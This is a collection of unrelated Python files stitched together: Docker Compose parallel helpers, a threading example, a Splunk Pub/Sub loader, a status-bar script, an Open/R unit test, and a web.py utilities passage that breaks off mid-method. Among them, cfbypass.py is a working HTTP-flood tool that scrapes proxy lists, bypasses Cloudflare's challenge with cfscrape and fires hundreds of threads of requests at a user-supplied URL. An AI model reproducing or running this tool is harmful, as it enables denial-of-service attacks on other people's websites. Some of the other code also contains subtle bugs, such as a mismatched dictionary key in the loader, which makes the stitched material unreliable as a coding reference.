def feed_queue(objects, func, get_deps, results, state, limiter):
"""
Starts producer threads for any objects which are ready to be processed
(i.e. they have no dependencies which haven't been successfully processed).
Shortcuts any objects whose dependencies have failed and places an
(object, None, UpstreamError()) tuple on the results queue.
"""
pending = state.pending()
log.debug('Pending: {}'.format(pending))
for obj in pending:
deps = get_deps(obj)
try:
if any(dep[0] in state.failed for dep in deps):
log.debug('{} has upstream errors - not processing'.format(obj))
results.put((obj, None, UpstreamError()))
state.failed.add(obj)
elif all(
dep not in objects or (
dep in state.finished and (not ready_check or ready_check(dep))
) for dep, ready_check in deps
):
log.debug('Starting producer thread for {}'.format(obj))
t = Thread(target=producer, args=(obj, func, results, limiter))
t.daemon = True
t.start()
state.started.add(obj)
except (HealthCheckFailed, NoHealthCheckConfigured) as e:
log.debug(
'Healthcheck for service(s) upstream of {} failed - '
'not processing'.format(obj)
)
results.put((obj, None, e))
except CompletedUnsuccessfully as e:
log.debug(
                'Service(s) upstream of {} did not complete successfully - '
'not processing'.format(obj)
)
results.put((obj, None, e))
if state.is_done():
results.put(STOP)
class UpstreamError(Exception):
pass
class ParallelStreamWriter:
"""Write out messages for operations happening in parallel.
Each operation has its own line, and ANSI code characters are used
to jump to the correct line, and write over the line.
"""
default_ansi_mode = AnsiMode.AUTO
write_lock = Lock()
instance = None
instance_lock = Lock()
@classmethod
def get_instance(cls):
return cls.instance
@classmethod
def get_or_assign_instance(cls, writer):
cls.instance_lock.acquire()
try:
if cls.instance is None:
cls.instance = writer
return cls.instance
finally:
cls.instance_lock.release()
@classmethod
def set_default_ansi_mode(cls, ansi_mode):
cls.default_ansi_mode = ansi_mode
def __init__(self, stream, ansi_mode=None):
if ansi_mode is None:
ansi_mode = self.default_ansi_mode
self.stream = stream
self.use_ansi_codes = ansi_mode.use_ansi_codes(stream)
self.lines = []
self.width = 0
def add_object(self, msg, obj_index):
if msg is None:
return
self.lines.append(msg + obj_index)
self.width = max(self.width, len(msg + ' ' + obj_index))
def write_initial(self, msg, obj_index):
if msg is None:
return
return self._write_noansi(msg, obj_index, '')
def _write_ansi(self, msg, obj_index, status):
self.write_lock.acquire()
position = self.lines.index(msg + obj_index)
diff = len(self.lines) - position
# move up
self.stream.write("%c[%dA" % (27, diff))
# erase
self.stream.write("%c[2K\r" % 27)
self.stream.write("{:<{width}} ... {}\r".format(msg + ' ' + obj_index,
status, width=self.width))
# move back down
self.stream.write("%c[%dB" % (27, diff))
self.stream.flush()
self.write_lock.release()
def _write_noansi(self, msg, obj_index, status):
self.stream.write(
"{:<{width}} ... {}\r\n".format(
msg + ' ' + obj_index, status, width=self.width
)
)
self.stream.flush()
def write(self, msg, obj_index, status, color_func):
if msg is None:
return
if self.use_ansi_codes:
self._write_ansi(msg, obj_index, color_func(status))
else:
self._write_noansi(msg, obj_index, status)
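# Illustrative sketch (hypothetical usage, not taken from compose): the writer
# keeps one output line per (msg, name) pair and rewrites it in place as the
# status changes.
def _stream_writer_example():  # pragma: no cover - documentation example only
    writer = ParallelStreamWriter.get_or_assign_instance(
        ParallelStreamWriter(sys.stderr))
    writer.add_object('Creating', 'web_1')
    writer.write_initial('Creating', 'web_1')
    writer.write('Creating', 'web_1', 'done', green)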
def parallel_operation(containers, operation, options, message):
parallel_execute(
containers,
operator.methodcaller(operation, **options),
operator.attrgetter('name'),
message,
)
def parallel_remove(containers, options):
stopped_containers = [c for c in containers if not c.is_running]
parallel_operation(stopped_containers, 'remove', options, 'Removing')
def parallel_pause(containers, options):
parallel_operation(containers, 'pause', options, 'Pausing')
def parallel_unpause(containers, options):
parallel_operation(containers, 'unpause', options, 'Unpausing')
def parallel_kill(containers, options):
parallel_operation(containers, 'kill', options, 'Killing')
|
Chap10_Example10.40.py
|
from threading import *
from queue import Queue
from time import sleep
import random
def myproducer():
for i in range(5):
item = random.randint(1, 100)
print(f"Item No. {i} produced by producer is: ", item)
myqueue_obj.put(item)
print("Notification given by the producer")
sleep(1)
def myconsumer():
print("Waiting for updation by consumer")
for i in range(5):
sleep(1)
print(f"The item no. {i} consumed by the consumer is: ", myqueue_obj.get())
myqueue_obj = Queue()
myt1 = Thread(target=myproducer)
myt2 = Thread(target=myconsumer)
myt1.start()
myt2.start()
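# Wait for both threads to finish; queue.Queue does the locking and blocking
# internally, so no explicit Condition/notify handling is needed in this example.
myt1.join()
myt2.join()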
|
google_pubsub_data_loader.py
|
import traceback
import time
from splunktalib.common import log
logger = log.Logs().get_logger("main")
import google_ta_common.google_consts as ggc
import pubsub_mod.google_pubsub_consts as gpc
import google_wrapper.pubsub_wrapper as gpw
class GooglePubSubDataLoader(object):
def __init__(self, config):
"""
:config: dict object
{
"appname": xxx,
"use_kv_store": xxx,
"proxy_url": xxx,
"proxy_port": xxx,
"proxy_username": xxx,
"proxy_password": xxx,
"proxy_rdns": xxx,
"proxy_type": xxx,
"google_credentials": xxx,
"google_project": xxx,
"google_subscription": xxx,
"index": xxx,
}
"""
self._config = config
self._source = "{project}:{subscription}".format(
project=self._config[ggc.google_project],
subscription=self._config[gpc.google_subscription])
self._running = False
self._stopped = False
def get_interval(self):
return self._config[ggc.polling_interval]
def stop(self):
self._stopped = True
logger.info("Stopping GooglePubSubDataLoader")
def __call__(self):
self.index_data()
def index_data(self):
if self._running:
return
self._running = True
logger.info("Start collecting data for project=%s, subscription=%s",
self._config[ggc.google_project],
self._config[gpc.google_subscription])
while not self._stopped:
try:
self._do_safe_index()
except Exception:
logger.error(
"Failed to collect data for project=%s, subscription=%s, "
"error=%s", self._config[ggc.google_project],
self._config[gpc.google_subscription],
traceback.format_exc())
time.sleep(2)
continue
logger.info("End of collecting data for project=%s, subscription=%s",
self._config[ggc.google_project],
self._config[gpc.google_subscription])
def _do_safe_index(self):
msgs_metrics = {
"current_record_count": 0,
"record_report_threshhold": 1000000,
"record_report_start": time.time()
}
sub = gpw.GooglePubSub(logger, self._config)
while not self._stopped:
for msgs in sub.pull_messages():
if msgs:
self._index_messages(msgs, msgs_metrics)
sub.ack_messages(msgs)
self._running = False
def _index_messages(self, msgs, msgs_metrics):
msgs_metrics["current_record_count"] += len(msgs)
current_count = msgs_metrics["current_record_count"]
        if current_count >= msgs_metrics["record_report_threshold"]:
            logger.info(
                "index %s events for project=%s, subscription=%s takes "
                "time=%s", current_count, self._config[ggc.google_project],
                self._config[gpc.google_subscription],
                time.time() - msgs_metrics["record_report_start"])
msgs_metrics["record_report_start"] = time.time()
msgs_metrics["current_record_count"] = 0
self._write_events(msgs)
def _write_events(self, msgs):
msgs = [msg["message"] for msg in msgs]
events = self._config[ggc.event_writer].create_events(
index=self._config[ggc.index], host=None, source=self._source,
sourcetype="google:pubsub", time=None, unbroken=False, done=False,
events=msgs)
while not self._stopped:
try:
self._config[ggc.event_writer].write_events(events, retry=1)
except Exception:
logger.error(
"Failed to index events for project=%s, subscription=%s, "
"error=%s", self._config[ggc.google_project],
self._config[gpc.google_subscription],
traceback.format_exc())
time.sleep(2)
if __name__ == "__main__":
import sys
import os
import logging
import threading
class O(object):
def write_events(self, index, source, sourcetype, events):
for event in events:
sys.stdout.write(event)
sys.stdout.write("\n")
logger = logging.getLogger("google")
ch = logging.StreamHandler()
logger.addHandler(ch)
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "zlchenken-78c88c5c115b.json"
config = {
ggc.data_loader: O(),
ggc.event_writer: O(),
ggc.checkpoint_dir: ".",
ggc.server_uri: "https://localhost:8089",
ggc.server_host: "localhost",
ggc.index: "main",
ggc.google_project: "zlchenken",
gpc.google_topic: "test_topic",
gpc.google_subscription: "sub_test_topic",
gpc.batch_count: 10,
gpc.base64encoded: True,
}
def pub():
ps = gpw.GooglePubSub(logger, config)
for i in range(10):
messages = ["i am counting {} {}".format(i, j) for j in range(10)]
ps.publish_messages(messages)
time.sleep(1)
pubthr = threading.Thread(target=pub)
pubthr.start()
loader = GooglePubSubDataLoader(config)
subthr = threading.Thread(target=loader.index_data)
subthr.start()
pubthr.join()
time.sleep(1)
loader.stop()
subthr.join()
# import cProfile
# import pstats
# import cStringIO
#
# pr = cProfile.Profile()
# pr.enable()
#
# pr.disable()
# s = cStringIO.StringIO()
# sortby = 'cumulative'
# ps = pstats.Stats(pr, stream=s).sort_stats(sortby)
# ps.print_stats()
# print s.getvalue()
|
cfbypass.py
|
import cfscrape
import os
import random
import time
import requests
import threading
import cloudscraper
from colorama import Fore
print(Fore.YELLOW + """
____ _____ ______ ______ _ ____ ____
/ ___| ___| | __ ) \ / / _ \ / \ / ___/ ___|
| | | |_ | _ \\ V /| |_) / _ \ \___ \___ \ \r
| |___| _| | |_) || | | __/ ___ \ ___) |__) |
\____|_| |____/ |_| |_| /_/ \_\____/____/
""")
print("Code By GogoZin -2019/8/12")
def opth():
for a in range(thr):
x = threading.Thread(target=atk)
x.start()
print("Threads " + str(a+1) + " Created ")
print(Fore.RED + "Wait A Few Seconds For Threads Ready To Attack ...")
time.sleep(10)
input(Fore.CYAN + "Press Enter To Launch Attack !")
global oo
oo = True
oo = False
def main():
global url
global list
global pprr
global thr
global per
list = str('proxies.txt')
pprr = open(list).readlines()
print(Fore.GREEN + "Proxies Count : " + Fore.WHITE + "%d" %len(pprr))
url = str(input(Fore.GREEN + "Url : " + Fore.WHITE))
scraper = cfscrape.create_scraper() # returns a CloudflareScraper instance
# Or: scraper = cfscrape.CloudflareScraper() # CloudflareScraper inherits from requests.Session
tokens, user_agent = cfscrape.get_tokens(url)
print(tokens, user_agent)
return
ssl = str(input(Fore.GREEN + "Enable SSL Mode ? (y/n) : " + Fore.WHITE))
ge = str(input(Fore.GREEN + "Get New Proxies List ? (y/n) : " + Fore.WHITE))
if ge =='y':
if ssl == 'y':
rsp = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all&anonymity=all&ssl=yes&timeout=2000') #Code By GogoZin
with open('proxies.txt','wb') as fp:
fp.write(rsp.content)
print(Fore.CYAN + "Sucess Get Https Proxies List !")
else:
rsp = requests.get('https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all&anonymity=all&ssl=all&timeout=1000') #Code By GogoZin
with open('proxies.txt','wb') as fp:
fp.write(rsp.content)
print(Fore.CYAN + "Sucess Get Http Proxies List !")
else:
pass
thr = int(input(Fore.GREEN + "Threads (1-400 Default Is 300) : " + Fore.WHITE))
per = int(input(Fore.GREEN + "CC.Power (1-100 Default Is 70) : " + Fore.WHITE))
opth()
def atk():
pprr = open(list).readlines()
proxy = random.choice(pprr).strip().split(":")
s = cfscrape.create_scraper()
s.proxies = {}
s.proxies['http'] = 'http://'+str(proxy[0])+":"+str(proxy[1])
s.proxies['https'] = 'https://'+str(proxy[0])+":"+str(proxy[1])
time.sleep(5)
while True:
while oo:
try:
s.get(url)
print(Fore.CYAN + "Bypass -> " + Fore.WHITE + str(url)+ Fore.CYAN + " From~# " +Fore.WHITE+ str(proxy[0])+":"+str(proxy[1]))
try:
for g in range(per):
s.get(url)
print(Fore.CYAN + "Bypass -> " + Fore.WHITE + str(url)+Fore.CYAN + " From~# " +Fore.WHITE + str(proxy[0])+":"+str(proxy[1])) #code By GogoZin
s.close()
except:
s.close()
except:
s.close()
print(Fore.RED + "Can't Connect To Proxies Or Url ! u:" + url + " | proxy:" + s.proxies['https'])
if __name__ == "__main__":
main()
|
main.py
|
import subprocess, threading, time, importlib, sys, requests
import config
threads = []
def block_tup_to_class(tup):
block_module = importlib.import_module('commands.' + tup[0])
block = block_module.Block(tup[3])
block.type = tup[0]
block.icon = tup[1]
block.interval = tup[2]
return block
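# Each entry of config.blocks is expected to be a 4-tuple of
# (module name under commands/, icon string, refresh interval in ms, Block args);
# e.g. ("battery", "B: ", 5000, {}) - the concrete values here are hypothetical.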
blocks = list(map(block_tup_to_class, config.blocks))
def setroot(name):
name = name + config.suffix
return subprocess.run(["xsetroot", "-name", name])
def block_fn(block):
t = threading.currentThread()
if not block:
return stop_threads()
while getattr(t, "do_run", True):
block.fetch()
time.sleep(block.interval / 1000)
def create_blocks_threads():
global threads
stop_threads()
threads = []
for block in blocks:
t = threading.Thread(
target=block_fn,
daemon=True,
args=[block] # have to use either [block] or (block,)
)
t.start()
threads.append(t)
def block_to_str(block):
prefix = block.get_icon() if block.override_icon else block.icon
content = block.content
return prefix + content
def stop_threads():
for t in threads:
t.do_run = False
for t in threads:
if not t.is_alive():
t.join() # Waits until thread terminates
def construct_multi_price_url(inputs, outputs):
return f'''https://min-api.cryptocompare.com/data/pricemulti?fsyms={','.join(inputs)}&tsyms={','.join(outputs)}'''
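# For example, construct_multi_price_url(["BTC", "ETH"], ["USD"]) evaluates to
# 'https://min-api.cryptocompare.com/data/pricemulti?fsyms=BTC,ETH&tsyms=USD'.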
def fetch_crypto_fn():
url = construct_multi_price_url(config.crypto_currencies, [config.fiat_currency])
crypto_module = importlib.import_module('commands.crypto')
t = threading.currentThread()
while getattr(t, "do_run", True):
res = requests.get(url)
data = res.json()
crypto_module.Block.cache = data
time.sleep(config.crypto_interval / 1000)
def create_crypto_thread():
t = threading.Thread(
target=fetch_crypto_fn,
daemon=True
)
t.start()
threads.append(t)
def main():
create_blocks_threads()
if len(config.crypto_currencies) != 0:
create_crypto_thread()
def setter_thread_fn():
t = threading.currentThread()
while getattr(t, "do_run", True):
blocks_strs = map(block_to_str, blocks)
root_str = config.delimeter.join(blocks_strs)
print(root_str)
if '--no-setroot' not in sys.argv:
setroot(root_str)
time.sleep(config.interval / 1000)
global threads
t = threading.Thread(target=setter_thread_fn, daemon=True, name='setter_thread')
t.start()
threads.append(t)
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print("Recieved SIGINT, stopping xblocks")
stop_threads()
break
if __name__ == "__main__":
main()
import sys
sys.exit()
import subprocess, threading, requests, json, datetime, time, importlib, sys
config = importlib.import_module('config')
blocks_cached_data = {}
threads = []
def reload_config():
global config
config = importlib.import_module('config')
def setroot(name):
reload_config()
name = name + config.suffix
return subprocess.run(["xsetroot", "-name", name])
def get_clock_icon():
clock_pos = datetime.datetime.now().strftime("%I")
if clock_pos == "00": clock_icon = "🕛"
elif clock_pos == "01": clock_icon = "🕐"
elif clock_pos == "02": clock_icon = "🕑"
elif clock_pos == "03": clock_icon = "🕒"
elif clock_pos == "04": clock_icon = "🕓"
elif clock_pos == "05": clock_icon = "🕔"
elif clock_pos == "06": clock_icon = "🕕"
elif clock_pos == "07": clock_icon = "🕖"
elif clock_pos == "08": clock_icon = "🕗"
elif clock_pos == "09": clock_icon = "🕘"
elif clock_pos == "10": clock_icon = "🕙"
elif clock_pos == "11": clock_icon = "🕚"
elif clock_pos == "12": clock_icon = "🕛"
else: clock_icon = "❌"
return clock_icon
def block_to_str(block):
prefix = block[2] if config.use_emoji else block[1]
temp_blocks_cache = blocks_cached_data
if 'crypto' in temp_blocks_cache:
temp_blocks_cache.pop('crypto')
content = temp_blocks_cache.get(block[0], 'Loading')
if type(content) == tuple:
content = content[0]
if prefix == '{}' and block[0] == 'time':
prefix = prefix.format(get_clock_icon())
return prefix + content
def construct_multi_price_url(inputs, outputs):
return f'''https://min-api.cryptocompare.com/data/pricemulti?fsyms={','.join(inputs)}&tsyms={','.join(outputs)}'''
def create_listener_thread(listener):
t = threading.Thread(
target=listener['function'],
daemon=True,
name=listener.get('name', 'Generic listener thread'),
args=listener.get('args', None)
)
return t
def block_fn(block):
t = threading.currentThread()
if not block:
return do_exit()
while getattr(t, "do_run", True):
# TODO do stuff here
if callable(block[0]):
blocks_cached_data[block[0]] = block[0]()
elif 'price ' in block[0]:
# is crypto handler
cryptos_cache = blocks_cached_data.get('price', 'Loading')
if cryptos_cache == 'Loading':
crypto_price = cryptos_cache
else:
# crypto_price = cryptos_cache[0].get(config.fiat_currency.upper(), {})
# crypto_price = crypto_price.get(block[0].replace('price ', '').upper(), 'Error!')
crypto_price = cryptos_cache[0].get(block[0].replace('price ', '').upper(), {})
crypto_price = crypto_price.get(config.fiat_currency.upper(), 'Error!')
crypto_price = f'{config.fiat_currency_prefix}{crypto_price}'
crypto_price = f'{crypto_price}{config.fiat_currency_suffix}'
blocks_cached_data[block[0]] = (crypto_price, datetime.datetime.now())
elif 'cmd ' in block[0]:
command = block[0].replace('cmd ', '')
proc = subprocess.run(["bash", "-c", command], capture_output=True)
raw_output = proc.stdout
output_str = raw_output.decode('utf-8')
blocks_cached_data[block[0]] = output_str
elif block[0] == 'time':
blocks_cached_data[block[0]] = time.strftime('%H:%M:%S')
elif block[0] == 'date':
blocks_cached_data[block[0]] = datetime.date.today().strftime('%d.%m.%Y')
elif block[0] == 'datetime':
blocks_cached_data[block[0]] = datetime.datetime.now().strftime('%d.%m.%Y %H:%M:%S')
else:
pass # is invalid
time.sleep(block[3] / 1000)
if config.debug:
print("Stopped " + t.name + " thread.")
def fetch_fn(options):
name = options['name']
get_url = options['get_url']
use_json = options['use_json']
cache_key = options['cache_key']
get_interval = options['get_interval']
if config.debug:
print('Fetch thread ' + name + ' started')
t = threading.currentThread()
while getattr(t, "do_run", True):
def get_data():
if config.debug:
print('Fetch thread ' + name + ' getting data')
global blocks_cached_data
url = get_url()
res = requests.get(url)
data = res.json() if use_json else res.text
blocks_cached_data[cache_key] = (data, datetime.datetime.now())
def check_get():
if not blocks_cached_data.get(cache_key):
return get_data()
# diff between last request and right now
time_diff = (datetime.datetime.now() - blocks_cached_data[cache_key][1])
time_diff_ms = time_diff.total_seconds() * 1000
# if more diff than interval
if time_diff_ms > get_interval():
return get_data()
time.sleep(1)
check_get()
if config.debug:
print('Stopped ' + name + ' thread.')
def create_crypto_thread():
def get_crypto_url():
reload_config()
return construct_multi_price_url(config.crypto_currencies, [config.fiat_currency])
def get_crypto_interval():
reload_config()
return config.crypto_interval
t = create_listener_thread({
'function': fetch_fn,
'name': 'crypto',
'args': [{
'name': 'crypto',
'get_url': get_crypto_url,
'cache_key': 'price',
'get_interval': get_crypto_interval,
'use_json': True,
}],
})
t.start()
threads.append(t)
def create_weather_thread():
def get_weather_interval():
reload_config()
return config.weather_interval
t = create_listener_thread({
'function': fetch_fn,
'name': 'crypto',
'args': [{
'name': 'weather',
'get_url': lambda: 'https://wttr.in/' + config.weather_location + '?format=%t',
'cache_key': 'weather',
'get_interval': get_weather_interval,
'use_json': False,
}],
})
t.start()
threads.append(t)
def create_blocks_threads():
global threads
stop_threads()
threads = []
for block in config.blocks:
t = create_listener_thread({
'function': block_fn,
'name': block[1],
'args': [block] # have to use either [block] or (block,)
})
t.start()
threads.append(t)
def stop_threads():
for t in threads:
if config.debug:
print("Trying to stop " + t.name + " thread.")
t.do_run = False
for t in threads:
if not t.is_alive():
t.join() # Waits until thread terminates
def do_exit():
if config.debug:
print("Trying to stop listener threads.")
stop_threads()
if config.debug:
print("Stopped listener threads.")
print("Trying to stop main thread.")
setter_thread.do_run = False
setter_thread.join() # Waits until thread terminates
if __name__ == "__main__":
create_blocks_threads()
if len(config.crypto_currencies) > 0:
create_crypto_thread()
if config.fetch_weather:
create_weather_thread()
def setter_thread_fn():
t = threading.currentThread()
while getattr(t, "do_run", True):
blocks_strs = map(block_to_str, config.blocks)
root_str = config.delimeter.join(blocks_strs)
print(root_str)
if '--no-setroot' not in sys.argv:
setroot(root_str)
time.sleep(1)
if config.debug:
print("Stopped main thread.")
setter_thread = threading.Thread(target=setter_thread_fn, daemon=True, name='setter_thread')
setter_thread.start()
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
print("Recieved SIGINT, stopping xblocks")
if config.debug:
print("Cache:", blocks_cached_data)
print("Threads:", threads)
do_exit()
break
|
prefix_mgr_client_tests.py
|
#!/usr/bin/env python
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from openr.utils import socket
from openr.clients import prefix_mgr_client
from openr.PrefixManager import ttypes as prefix_mgr_types
from openr.Lsdb import ttypes as lsdb_types
from openr.cli.utils.utils import ip_str_to_prefix, sprint_prefix
import zmq
import unittest
from multiprocessing import Process
prefix_entry1 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:1/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry2 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:2/128'),
type=lsdb_types.PrefixType.LOOPBACK)
prefix_entry3 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:3/128'),
type=lsdb_types.PrefixType.LOOPBACK)
class PrefixMgr():
def __init__(self, zmq_ctx, url):
self._prefix_mgr_server_socket = socket.Socket(zmq_ctx, zmq.REP)
self._prefix_mgr_server_socket.bind(url)
self._prefix_map = {sprint_prefix(prefix_entry1.prefix): prefix_entry1,
sprint_prefix(prefix_entry2.prefix): prefix_entry2,
sprint_prefix(prefix_entry3.prefix): prefix_entry3}
def process_request(self):
req = self._prefix_mgr_server_socket.recv_thrift_obj(
prefix_mgr_types.PrefixManagerRequest)
if req.cmd == prefix_mgr_types.PrefixManagerCommand.ADD_PREFIXES:
for prefix_entry in req.prefixes:
self._prefix_map[sprint_prefix(prefix_entry.prefix)] = prefix_entry
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=True))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.WITHDRAW_PREFIXES:
success = False
for prefix_entry in req.prefixes:
prefix_str = sprint_prefix(prefix_entry.prefix)
if prefix_str in self._prefix_map:
del self._prefix_map[prefix_str]
success = True
self._prefix_mgr_server_socket.send_thrift_obj(
prefix_mgr_types.PrefixManagerResponse(success=success))
if req.cmd == prefix_mgr_types.PrefixManagerCommand.GET_ALL_PREFIXES:
resp = prefix_mgr_types.PrefixManagerResponse()
resp.prefixes = self._prefix_map.values()
resp.success = True
self._prefix_mgr_server_socket.send_thrift_obj(resp)
class TestPrefixMgrClient(unittest.TestCase):
def test(self):
socket_url = "inproc://prefix-manager-url"
PrefixMgr(zmq.Context(), socket_url)
num_req = 5
def _prefix_mgr_server():
prefix_mgr_server = PrefixMgr(zmq.Context(), socket_url)
for _ in range(num_req):
prefix_mgr_server.process_request()
def _prefix_mgr_client():
prefix_mgr_client_inst = prefix_mgr_client.PrefixMgrClient(
zmq.Context(), socket_url)
resp = prefix_mgr_client_inst.add_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'], 'LOOPBACK')
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
prefix_entry4 = lsdb_types.PrefixEntry(
prefix=ip_str_to_prefix('2620:0:1cff:dead:bef1:ffff:ffff:4/128'),
type=lsdb_types.PrefixType.LOOPBACK)
self.assertTrue(resp.success)
self.assertTrue(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:4/128'])
self.assertTrue(resp.success)
resp = prefix_mgr_client_inst.view_prefix()
self.assertTrue(resp.success)
self.assertFalse(prefix_entry4 in resp.prefixes)
resp = prefix_mgr_client_inst.withdraw_prefix(
['2620:0:1cff:dead:bef1:ffff:ffff:5/128'])
self.assertFalse(resp.success)
p = Process(target=_prefix_mgr_server)
p.start()
q = Process(target=_prefix_mgr_client)
q.start()
p.join()
q.join()
|
utils.py
|
#!/usr/bin/env python
"""
General Utilities
(part of web.py)
"""
__all__ = [
"Storage", "storage", "storify",
"iters",
"rstrips", "lstrips", "strips",
"safeunicode", "safestr", "utf8",
"TimeoutError", "timelimit",
"Memoize", "memoize",
"re_compile", "re_subm",
"group",
"IterBetter", "iterbetter",
"dictreverse", "dictfind", "dictfindall", "dictincr", "dictadd",
"listget", "intget", "datestr",
"numify", "denumify", "commify", "dateify",
"nthstr",
"CaptureStdout", "capturestdout", "Profile", "profile",
"tryall",
"ThreadedDict", "threadeddict",
"autoassign",
"to36",
"safemarkdown",
"sendmail"
]
import re, sys, time, threading
try:
import subprocess
except ImportError:
subprocess = None
try: import datetime
except ImportError: pass
class Storage(dict):
"""
A Storage object is like a dictionary except `obj.foo` can be used
in addition to `obj['foo']`.
>>> o = storage(a=1)
>>> o.a
1
>>> o['a']
1
>>> o.a = 2
>>> o['a']
2
>>> del o.a
>>> o.a
Traceback (most recent call last):
...
AttributeError: 'a'
"""
def __getattr__(self, key):
try:
return self[key]
except KeyError, k:
raise AttributeError, k
def __setattr__(self, key, value):
self[key] = value
def __delattr__(self, key):
try:
del self[key]
except KeyError, k:
raise AttributeError, k
def __repr__(self):
return '<Storage ' + dict.__repr__(self) + '>'
storage = Storage
def storify(mapping, *requireds, **defaults):
"""
    Creates a `storage` object from dictionary `mapping`, raising `KeyError` if
    `mapping` doesn't have all of the keys in `requireds` and using the default
values for keys found in `defaults`.
For example, `storify({'a':1, 'c':3}, b=2, c=0)` will return the equivalent of
`storage({'a':1, 'b':2, 'c':3})`.
If a `storify` value is a list (e.g. multiple values in a form submission),
`storify` returns the last element of the list, unless the key appears in
`defaults` as a list. Thus:
>>> storify({'a':[1, 2]}).a
2
>>> storify({'a':[1, 2]}, a=[]).a
[1, 2]
>>> storify({'a':1}, a=[]).a
[1]
>>> storify({}, a=[]).a
[]
    Similarly, if the value has a `value` attribute, `storify` will return _its_
value, unless the key appears in `defaults` as a dictionary.
>>> storify({'a':storage(value=1)}).a
1
>>> storify({'a':storage(value=1)}, a={}).a
<Storage {'value': 1}>
>>> storify({}, a={}).a
{}
Optionally, keyword parameter `_unicode` can be passed to convert all values to unicode.
>>> storify({'x': 'a'}, _unicode=True)
<Storage {'x': u'a'}>
>>> storify({'x': storage(value='a')}, x={}, _unicode=True)
<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
def unicodify(s):
if _unicode and isinstance(s, str): return safeunicode(s)
else: return s
def getvalue(x):
if hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
iters.append(set)
if hasattr(__builtin__, 'frozenset'):
    iters.append(frozenset)
if sys.version_info < (2,6): # sets module deprecated in 2.6
try:
from sets import Set
iters.append(Set)
except ImportError:
pass
class _hack(tuple): pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""
removes the string `remove` from the right of `text`
>>> rstrips("foobar", "bar")
'foo'
"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""
removes the string `remove` from the left of `text`
>>> lstrips("foobar", "foo")
'bar'
"""
return _strips('l', text, remove)
def strips(text, remove):
"""
removes the string `remove` from the both sides of `text`
>>> strips("foobarfoo", "foo")
'bar'
"""
return rstrips(lstrips(text, remove), remove)
def safeunicode(obj, encoding='utf-8'):
r"""
Converts any given object to unicode string.
>>> safeunicode('hello')
u'hello'
>>> safeunicode(2)
u'2'
>>> safeunicode('\xe1\x88\xb4')
u'\u1234'
"""
if isinstance(obj, unicode):
return obj
elif isinstance(obj, str):
return obj.decode(encoding)
else:
if hasattr(obj, '__unicode__'):
return unicode(obj)
else:
return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
r"""
Converts any given object to utf-8 encoded string.
>>> safestr('hello')
'hello'
>>> safestr(u'\u1234')
'\xe1\x88\xb4'
>>> safestr(2)
'2'
"""
if isinstance(obj, unicode):
return obj.encode('utf-8')
elif isinstance(obj, str):
return obj
else:
return str(obj)
# for backward-compatibility
utf8 = safestr
class TimeoutError(Exception): pass
def timelimit(timeout):
"""
A decorator to limit a function to `timeout` seconds, raising `TimeoutError`
if it takes longer.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>>
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> timelimit(1)(meaningoflife)()
42
_Caveat:_ The function isn't stopped after `timeout` seconds but continues
executing in a separate thread. (There seems to be no way to kill a thread.)
inspired by <http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878>
"""
def _1(function):
def _2(*args, **kw):
class Dispatch(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
self.error = None
self.setDaemon(True)
self.start()
def run(self):
try:
self.result = function(*args, **kw)
except:
self.error = sys.exc_info()
c = Dispatch()
c.join(timeout)
if c.isAlive():
raise TimeoutError, 'took too long'
if c.error:
raise c.error[0], c.error[1]
return c.result
return _2
return _1
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>> fastlife = memoize(meaningoflife)
>>> meaningoflife()
42
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> fastlife()
42
>>> timelimit(.1)(fastlife)()
42
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args, **keywords):
